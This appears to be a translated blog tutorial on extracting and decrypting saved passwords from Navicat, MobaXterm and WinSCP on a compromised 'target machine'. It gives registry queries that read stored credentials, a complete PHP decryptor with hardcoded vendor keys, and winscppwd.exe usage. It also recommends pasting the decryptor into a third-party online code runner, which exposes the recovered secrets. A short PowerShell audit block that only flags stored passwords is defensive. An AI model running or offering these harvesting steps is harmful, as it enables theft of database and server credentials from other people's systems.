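I previously published an article on cracking Xshell and FinalShell passwords. This article continues the discussion with some other common connection tools. If you find any mistakes, please point them out in the comments!
I. Navicat password cracking:
Navicat stores its saved connections in a different registry location for each database type: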
MySQL: HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers
MariaDB: HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMARIADB\Servers
Microsoft SQL: HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMSSQL\Servers
Oracle: HKEY_CURRENT_USER\Software\PremiumSoft\NavicatOra\Servers
PostgreSQL: HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPG\Servers
SQLite: HKEY_CURRENT_USER\Software\PremiumSoft\NavicatSQLite\Servers
Taking MySQL as an example:
reg query "HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers"
This lists the connections that have saved passwords:
Look up the key values: host, UserName, pwd
reg query "HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\127.0.0.1" /s /v host
reg query "HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\127.0.0.1" /s /v username
reg query "HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\127.0.0.1" /s /v pwd
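Take the pwd value and decrypt it.
If you have logged in to the target machine remotely, you can export the saved connections directly:
Tick: Export password
The export produces an .ncx file. Opening it shows content like the following; the relevant keywords are: UserName="xx" Password="xx"
The Password is encrypted, so what remains is to crack it. Someone on GitHub has already written a cracking script: copy --> edit --> run, changing only the last few lines. The script is as follows: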
<?php
class NavicatPassword
{
    protected $version = 0;
    protected $aesKey = 'libcckeylibcckey';
    protected $aesIv = 'libcciv libcciv ';
    protected $blowString = '3DC5CA39';
    protected $blowKey = null;
    protected $blowIv = null;

    public function __construct($version = 12)
    {
        $this->version = $version;
        $this->blowKey = sha1('3DC5CA39', true);
        $this->blowIv = hex2bin('d9c7c3c8870d64bd');
    }

    // Dispatch on the version passed to the constructor (11 or 12).
    public function encrypt($string)
    {
        $result = FALSE;
        switch ($this->version) {
            case 11:
                $result = $this->encryptEleven($string);
                break;
            case 12:
                $result = $this->encryptTwelve($string);
                break;
            default:
                break;
        }
        return $result;
    }

    // Version 11: Blowfish in a chained mode over 8-byte blocks.
    protected function encryptEleven($string)
    {
        $round = intval(floor(strlen($string) / 8));
        $leftLength = strlen($string) % 8;
        $result = '';
        $currentVector = $this->blowIv;
        for ($i = 0; $i < $round; $i++) {
            $temp = $this->encryptBlock($this->xorBytes(substr($string, 8 * $i, 8), $currentVector));
            $currentVector = $this->xorBytes($currentVector, $temp);
            $result .= $temp;
        }
        // A trailing partial block is XORed with the encrypted vector.
        if ($leftLength) {
            $currentVector = $this->encryptBlock($currentVector);
            $result .= $this->xorBytes(substr($string, 8 * $i, $leftLength), $currentVector);
        }
        return strtoupper(bin2hex($result));
    }

    protected function encryptBlock($block)
    {
        return openssl_encrypt($block, 'BF-ECB', $this->blowKey, OPENSSL_RAW_DATA|OPENSSL_NO_PADDING);
    }

    protected function decryptBlock($block)
    {
        return openssl_decrypt($block, 'BF-ECB', $this->blowKey, OPENSSL_RAW_DATA|OPENSSL_NO_PADDING);
    }

    // XOR $str1 with $str2 byte by byte, over the length of $str1.
    protected function xorBytes($str1, $str2)
    {
        $result = '';
        for ($i = 0; $i < strlen($str1); $i++) {
            $result .= chr(ord($str1[$i]) ^ ord($str2[$i]));
        }
        return $result;
    }

    // Version 12: AES-128-CBC with a fixed key and IV.
    protected function encryptTwelve($string)
    {
        $result = openssl_encrypt($string, 'AES-128-CBC', $this->aesKey, OPENSSL_RAW_DATA, $this->aesIv);
        return strtoupper(bin2hex($result));
    }

    public function decrypt($string)
    {
        $result = FALSE;
        switch ($this->version) {
            case 11:
                $result = $this->decryptEleven($string);
                break;
            case 12:
                $result = $this->decryptTwelve($string);
                break;
            default:
                break;
        }
        return $result;
    }

    protected function decryptEleven($upperString)
    {
        $string = hex2bin(strtolower($upperString));
        $round = intval(floor(strlen($string) / 8));
        $leftLength = strlen($string) % 8;
        $result = '';
        $currentVector = $this->blowIv;
        for ($i = 0; $i < $round; $i++) {
            $encryptedBlock = substr($string, 8 * $i, 8);
            $temp = $this->xorBytes($this->decryptBlock($encryptedBlock), $currentVector);
            $currentVector = $this->xorBytes($currentVector, $encryptedBlock);
            $result .= $temp;
        }
        if ($leftLength) {
            $currentVector = $this->encryptBlock($currentVector);
            $result .= $this->xorBytes(substr($string, 8 * $i, $leftLength), $currentVector);
        }
        return $result;
    }

    protected function decryptTwelve($upperString)
    {
        $string = hex2bin(strtolower($upperString));
        return openssl_decrypt($string, 'AES-128-CBC', $this->aesKey, OPENSSL_RAW_DATA, $this->aesIv);
    }
}

// One of two versions must be specified: 11 or 12
//$navicatPassword = new NavicatPassword(11);
$navicatPassword = new NavicatPassword(11);

// Decrypt
//$decode = $navicatPassword->decrypt('15057D7BA390');
// Replace the placeholder argument below with the password value obtained above.
$decode = "密码:".$navicatPassword->decrypt('获取到的密码');
echo $decode."\n";
?>
A recommended site for running scripts online: https://tool.lu/coderunner/
Copy the script, modify the commented lines, and run it to obtain the password:
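II. Obtaining MobaXterm passwords:
Settings --> Configuration
Then click show passwords to see the plaintext passwords directly:
This did not work when tested on the Personal edition; the Professional edition should work: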
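III. Obtaining WinSCP passwords:
1. First, the other party's WinSCP must be set to save passwords:
2. Where WinSCP stores saved passwords:
By default, the WinSCP configuration is stored under the corresponding Windows registry key (including the connection IP, user name and password hash). The registry key is fixed:
HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
3. Get the saved connection information: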
reg query "HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions"
This returns the saved connections:
reg query "HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\root@192.168.136.144"
Specify a connection to export its saved details:
Then use winscppwd.exe to crack it:
winscppwd.exe <UserName> <HostName> <Password>
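Cracked successfully:
If you have logged in to the target remotely, you can export a file and decrypt it:
The exported file has an .ini extension; run winscppwd.exe directly against the .ini file to decrypt it: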
winscppwd.exe xx.ini
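Decrypted successfully:
If the administrator has customized the path where the password file is saved, you can try to find the winscp.ini file and bring it back to a local machine for decryption.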
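Seen from the defender's side, the registry locations listed in sections I and III can be audited to find which saved sessions of the current user hold a stored password. The PowerShell below is an added example, not part of the original article or of either tool; the value names (`Host`, `UserName`, `Pwd` for Navicat and `HostName`, `UserName`, `Password` for WinSCP) are assumptions taken from the queries above, and the function name is hypothetical. It reports only whether a secret is present and never prints the stored value.

```powershell
# Added audit example (not from the original article): list saved sessions
# that carry a stored password, without printing the stored value itself.
$navicatProducts = 'Navicat', 'NavicatMARIADB', 'NavicatMSSQL',
                   'NavicatOra', 'NavicatPG', 'NavicatSQLite'

# Registry locations as listed in the article; value names are assumptions
# based on the article's reg query and winscppwd examples.
$targets = @(
    foreach ($p in $navicatProducts) {
        [pscustomobject]@{
            Tool      = $p
            Path      = "HKCU:\Software\PremiumSoft\${p}\Servers"
            HostValue = 'Host'; UserValue = 'UserName'; SecretValue = 'Pwd'
        }
    }
    [pscustomobject]@{
        Tool      = 'WinSCP'
        Path      = 'HKCU:\Software\Martin Prikryl\WinSCP 2\Sessions'
        HostValue = 'HostName'; UserValue = 'UserName'; SecretValue = 'Password'
    }
)

function Get-SavedSessionFinding {
    param([object[]]$Target = $targets)
    foreach ($t in $Target) {
        # Skip tools this user has never configured.
        if (-not (Test-Path -LiteralPath $t.Path)) { continue }
        foreach ($key in Get-ChildItem -LiteralPath $t.Path) {
            $values = Get-ItemProperty -LiteralPath $key.PSPath
            $secret = $values.($t.SecretValue)
            [pscustomobject]@{
                Tool        = $t.Tool
                Session     = $key.PSChildName
                HostName    = $values.($t.HostValue)
                UserName    = $values.($t.UserValue)
                HasPassword = -not ([string]::IsNullOrEmpty($secret))
            }
        }
    }
}

Get-SavedSessionFinding | Where-Object HasPassword |
    Sort-Object Tool, Session | Format-Table -AutoSize
```

Because the keys live under HKEY_CURRENT_USER, the script has to run in each user's own context to cover a shared workstation.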
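To get the password-cracking tool, leave the message winscppwd in the account backend.
The article and tools are for learning and discussion only. Using them for any illegal activity is prohibited and is not the author's responsibility!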